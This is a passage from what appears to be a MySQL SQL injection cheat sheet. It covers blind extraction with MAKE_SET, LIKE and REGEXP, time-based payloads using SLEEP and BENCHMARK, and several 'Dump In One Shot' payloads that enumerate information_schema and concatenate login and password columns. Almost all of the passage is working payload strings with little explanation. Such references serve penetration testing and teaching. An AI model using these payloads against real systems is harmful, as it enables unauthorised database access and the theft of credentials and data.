<p>FALSE: <code>if @@version starts with a 4</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="mi">2100935</span><span class="s1">&#39; OR IF(MID(@@version,1,1)=&#39;</span><span class="mi">4</span><span class="s1">&#39;,sleep(1),1)=&#39;</span><span class="mi">2</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">Response</span><span class="p">:</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="n">HTTP</span><span class="o">/</span><span class="mi">1</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="mi">200</span><span class="w"> </span><span class="n">OK</span>
</code></pre></div>
</li>
</ul>
<h3 id="mysql-blind-with-make_set">MYSQL Blind With MAKE_SET</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">length</span><span class="p">(</span><span class="k">version</span><span class="p">()))),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="n">ascii</span><span class="p">(</span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="n">POS</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">length</span><span class="p">(</span><span class="n">concat</span><span class="p">(</span><span class="n">login</span><span class="p">,</span><span class="n">password</span><span class="p">)))),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="n">ascii</span><span class="p">(</span><span class="k">substring</span><span class="p">(</span><span class="n">concat</span><span class="p">(</span><span class="n">login</span><span class="p">,</span><span class="n">password</span><span class="p">),</span><span class="n">POS</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>
<h3 id="mysql-blind-with-like">MYSQL Blind With LIKE</h3>
<p>In MySQL, the <code>LIKE</code> operator can be used to perform pattern matching in queries. The operator allows the use of wildcard characters to match unknown or partial string values. This is especially useful in a blind SQL injection context when an attacker does not know the length or specific content of the data stored in the database.</p>
<p>Wildcard Characters in LIKE:</p>
<ul>
<li><strong>Percentage Sign</strong> (<code>%</code>): This wildcard represents zero, one, or multiple characters. It can be used to match any sequence of characters.</li>
<li><strong>Underscore</strong> (<code>_</code>): This wildcard represents a single character. It's used for more precise matching when you know the structure of the data but not the specific character at a particular position.</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">cust_code</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">customer</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">cust_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;k__l&#39;</span><span class="p">;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">products</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">product_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%user_input%&#39;</span>
</code></pre></div>
<h3 id="mysql-blind-with-regexp">MySQL Blind with REGEXP</h3>
<p>Blind SQL injection can also be performed using the MySQL <code>REGEXP</code> operator, which is used for matching a string against a regular expression. This technique is particularly useful when attackers want to perform more complex pattern matching than what the <code>LIKE</code> operator can offer.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '^.{8,}$') --</code></td>
<td>Checking length</td>
</tr>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '[0-9]') --</code></td>
<td>Checking for the presence of digits</td>
</tr>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '^a[a-z]') --</code></td>
<td>Checking for data starting with "a"</td>
</tr>
</tbody>
</table>
<h2 id="mysql-time-based">MYSQL Time Based</h2>
<p>The following SQL snippets delay the response from MySQL.</p>
<ul>
<li>
<p>MySQL 4/5 : <a href="https://dev.mysql.com/doc/refman/8.4/en/select-benchmarking.html"><code>BENCHMARK()</code></a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="o">+</span><span class="n">BENCHMARK</span><span class="p">(</span><span class="mi">40000000</span><span class="p">,</span><span class="n">SHA1</span><span class="p">(</span><span class="mi">1337</span><span class="p">))</span><span class="o">+</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="s1">&#39;+BENCHMARK(3200,SHA1(1))+&#39;</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a><span class="k">AND</span><span class="w"> </span><span class="p">[</span><span class="n">RANDNUM</span><span class="p">]</span><span class="o">=</span><span class="n">BENCHMARK</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">]</span><span class="mi">000000</span><span class="p">,</span><span class="n">MD5</span><span class="p">(</span><span class="s1">&#39;[RANDSTR]&#39;</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>MySQL 5: <a href="https://dev.mysql.com/doc/refman/8.4/en/miscellaneous-functions.html#function_sleep"><code>SLEEP()</code></a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">RLIKE</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">])</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="k">OR</span><span class="w"> </span><span class="n">ELT</span><span class="p">([</span><span class="n">RANDNUM</span><span class="p">]</span><span class="o">=</span><span class="p">[</span><span class="n">RANDNUM</span><span class="p">],</span><span class="n">SLEEP</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">]))</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">XOR</span><span class="p">(</span><span class="k">IF</span><span class="p">(</span><span class="n">NOW</span><span class="p">()</span><span class="o">=</span><span class="n">SYSDATE</span><span class="p">(),</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">5</span><span class="p">),</span><span class="mi">0</span><span class="p">))</span><span class="n">XOR</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="o">=</span><span class="mi">0</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1337</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="o">-</span><span class="p">(</span><span class="k">IF</span><span class="p">((</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">),</span><span class="mi">0</span><span class="p">,</span><span class="mi">10</span><span class="p">)))))</span><span class="w"> </span><span class="n">RANDSTR</span><span class="p">)</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="using-sleep-in-a-subselect">Using SLEEP in a Subselect</h3>
<p>Extracting the length of the data.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;___&#39;</span><span class="p">)</span><span class="o">#</span><span class="w"> </span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;____&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;_____&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the first character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;A____&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;S____&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the second character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SA___&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SW___&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the third character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWA__&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWB__&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-26-3" name="__codelineno-26-3" href="#__codelineno-26-3"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWI__&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting column_name.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">column_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%pass%&#39;</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<h3 id="using-conditional-statements">Using Conditional Statements</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="k">USER</span><span class="p">()),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="o">&gt;=</span><span class="mi">100</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">BENCHMARK</span><span class="p">(</span><span class="mi">2000000</span><span class="p">,</span><span class="n">MD5</span><span class="p">(</span><span class="n">NOW</span><span class="p">())))</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-28-2" name="__codelineno-28-2" href="#__codelineno-28-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="k">USER</span><span class="p">()),</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">)))</span><span class="o">&gt;=</span><span class="mi">100</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">3</span><span class="p">))</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-28-3" name="__codelineno-28-3" href="#__codelineno-28-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">MID</span><span class="p">(</span><span class="o">@@</span><span class="k">version</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;5&#39;</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="err">&#39;</span><span class="mi">2</span>
</code></pre></div>
<h2 id="mysql-dios-dump-in-one-shot">MYSQL DIOS - Dump in One Shot</h2>
<p>DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an attacker to extract entire database contents in a single, well-crafted SQL injection payload. This method leverages the ability to concatenate multiple pieces of data into a single result set, which is then returned in one response from the database.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="p">(</span><span class="n">table_schema</span><span class="o">&gt;=@</span><span class="p">)</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x0D</span><span class="p">,</span><span class="mi">0</span><span class="n">x0A</span><span class="p">,</span><span class="s1">&#39; [ &#39;</span><span class="p">,</span><span class="n">table_schema</span><span class="p">,</span><span class="s1">&#39; ] &gt; &#39;</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="s1">&#39; &gt; &#39;</span><span class="p">,</span><span class="k">column_name</span><span 
class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="n">db_data</span><span class="p">.</span><span class="n">table_data</span><span class="p">)</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x0D</span><span class="p">,</span><span class="mi">0</span><span class="n">x0A</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">,</span><span class="s1">&#39; [ &#39;</span><span class="p">,</span><span class="n">column_data1</span><span class="p">,</span><span class="s1">&#39; ] &gt; &#39;</span><span class="p">,</span><span class="n">column_data2</span><span class="p">,</span><span class="s1">&#39; &gt; &#39;</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<ul>
<li>
<p>SecurityIdiots
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="n">make_set</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">make_set</span><span class="p">(</span><span class="mi">511</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="k">column_name</span><span class="p">)),</span><span class="o">@</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>Profexer
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3C62723E</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="k">column_name</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>Dr.Z3r0
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">xa7</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="k">column_name</span><span class="p">))),</span><span class="o">@</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>M@dBl00d
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="p">(</span><span class="k">Select</span><span class="w"> </span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="mi">2</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">xa3a</span><span class="p">,</span><span class="mi">2</span><span class="p">)),</span><span class="o">@</span><span class="p">,</span><span class="mi">2</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>Zen
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="o">+</span><span class="n">make_set</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">make_set</span><span class="p">(</span><span class="mi">511</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="k">column_name</span><span class="p">)),</span><span class="o">@</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>sharik
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="n">table_schema</span><span class="o">!=</span><span class="mi">0</span><span class="n">x696e666f726d6174696f6e5f736368656d61</span><span class="p">)</span><span class="k">and</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">in</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x203a3a20</span><span class="p">,</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c62723e</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span>
</code></pre></div></p>
</li>
</ul>
<h2 id="mysql-current-queries">MYSQL Current Queries</h2>
